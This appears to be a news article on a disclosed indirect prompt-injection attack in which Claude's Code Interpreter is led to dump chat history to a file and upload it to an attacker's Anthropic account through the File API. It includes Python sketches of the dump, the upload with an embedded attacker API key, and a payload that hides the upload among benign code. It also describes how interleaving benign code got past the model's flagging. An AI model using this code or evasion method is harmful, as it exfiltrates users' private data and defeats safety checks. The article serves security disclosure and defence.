A new security issue discovered by a security researcher reveals that Anthropic’s Claude AI system can be exploited through indirect prompt injection, allowing attackers to exfiltrate user data via its built‑in File API.
The attack, documented in a detailed technical post on October 28, 2025, demonstrates how Claude’s Code Interpreter and API features could be manipulated to send sensitive information from a victim’s workspace to an attacker‑controlled account.

Abusing Claude’s File API
Anthropic recently enabled network access within Claude’s Code Interpreter, allowing users to fetch resources from a set of approved domains, including package managers such as npm and PyPI as well as GitHub.
However, researchers found that one of the “approved” domains, api.anthropic.com, could be leveraged for malicious actions.


By planting an indirect prompt injection payload in content that Claude processes during a chat, an attacker could make the AI model execute instructions without the user’s awareness.
The exploit begins by instructing Claude to write sensitive data, such as previous chat conversations, to a local file within its sandbox environment.
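The write‑up does not reproduce the exact payload, but this first stage presumably amounts to ordinary file‑writing code executed inside the sandbox. A minimal sketch of what it might look like follows; the variable name, file name, and content are hypothetical placeholders, not the researcher’s published code:

```python
# Stage 1 (illustrative sketch only): the injected instructions tell Claude to
# dump conversation content it can see into a local file inside its sandbox.
# "conversation_text" and "conversation_dump.md" are hypothetical placeholders.
conversation_text = "...previous chat messages visible to the model..."

with open("conversation_dump.md", "w", encoding="utf-8") as f:
    f.write(conversation_text)
```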


The malicious payload then uses Anthropic’s File API to upload that file. Crucially, the code inserts the attacker’s API key, causing the upload to occur in the attacker’s Anthropic account rather than the user’s. This effectively transfers data out of the victim’s workspace.
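For illustration, the upload stage might look something like the sketch below, which posts the dumped file to Anthropic’s file‑upload endpoint while authenticating with the attacker’s key. The endpoint, header names, and beta flag reflect Anthropic’s public API documentation as understood here and should be treated as assumptions rather than the researcher’s verbatim code:

```python
# Stage 2 (illustrative sketch only): upload the dumped file to
# api.anthropic.com, authenticated with the ATTACKER's API key, so the file
# is stored in the attacker's account instead of the victim's.
import requests

ATTACKER_API_KEY = "sk-ant-..."  # attacker-controlled credential embedded in the payload

with open("conversation_dump.md", "rb") as f:
    resp = requests.post(
        "https://api.anthropic.com/v1/files",          # file-upload endpoint (assumed)
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",  # beta header per public docs (assumed)
        },
        files={"file": ("conversation_dump.md", f, "text/markdown")},
    )

print(resp.status_code, resp.json())  # on success, the file is visible only in the attacker's account
```

Because the request goes to api.anthropic.com, an allow‑listed domain, it passes the sandbox’s egress restrictions even though the data never touches an obviously attacker‑controlled server.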
Attackers can perform this process repeatedly to steal up to 30 MB per file upload, according to the File API’s documentation.
Initial tests proved inconsistent: Claude flagged suspicious activity in prompts containing a visible API key. The researcher bypassed these restrictions by interleaving benign code segments with the payload, making the request appear harmless.
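The write‑up does not publish the final evasion payload, but the described structure presumably resembles the sketch below, in which the exfiltration step is buried among routine‑looking analysis code so the script no longer reads as an obvious key‑plus‑upload sequence. Every name and value here is a hypothetical placeholder:

```python
# Illustrative structure of a disguised payload (hypothetical names throughout):
# benign data wrangling surrounds the exfiltration step so the script reads as
# routine analysis rather than an obvious key-plus-upload sequence.
import csv
import statistics
import requests

# --- benign-looking preamble --------------------------------------------------
rows = [{"region": "eu", "total": 42}, {"region": "us", "total": 57}]
with open("report.csv", "w", newline="") as f:
    csv.DictWriter(f, fieldnames=["region", "total"]).writerows(rows)
print("mean total:", statistics.mean(r["total"] for r in rows))

# --- exfiltration step, buried mid-script (see the previous sketch) ------------
with open("conversation_dump.md", "rb") as f:
    requests.post(
        "https://api.anthropic.com/v1/files",
        headers={"x-api-key": "sk-ant-...", "anthropic-version": "2023-06-01",
                 "anthropic-beta": "files-api-2025-04-14"},
        files={"file": f},
    )

# --- more benign-looking follow-up ---------------------------------------------
print("report written to report.csv")
```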


The discovery was disclosed to Anthropic via HackerOne on October 25, 2025, but the initial report was dismissed as “out of scope” and categorized as a model safety issue rather than a security vulnerability.
The researcher argues that this classification is incorrect: the exploit enables deliberate exfiltration of private data through authenticated API calls, making it a genuine security flaw rather than an incidental safety concern.
On October 30, Anthropic acknowledged the oversight and confirmed that data exfiltration attacks of this nature are indeed within the scope of responsible disclosure.
The company stated it is reviewing the misclassification process and urged users to monitor Claude’s behavior when executing scripts that access internal or sensitive data.
This incident highlights the growing overlap between AI safety and cybersecurity. As AI systems gain more integrated capabilities, including network access and memory functions, adversaries may find new ways to weaponize prompt injection techniques for data theft.
The case reinforces the need for rigorous monitoring, stricter egress controls, and clearer vulnerability handling procedures in AI platforms.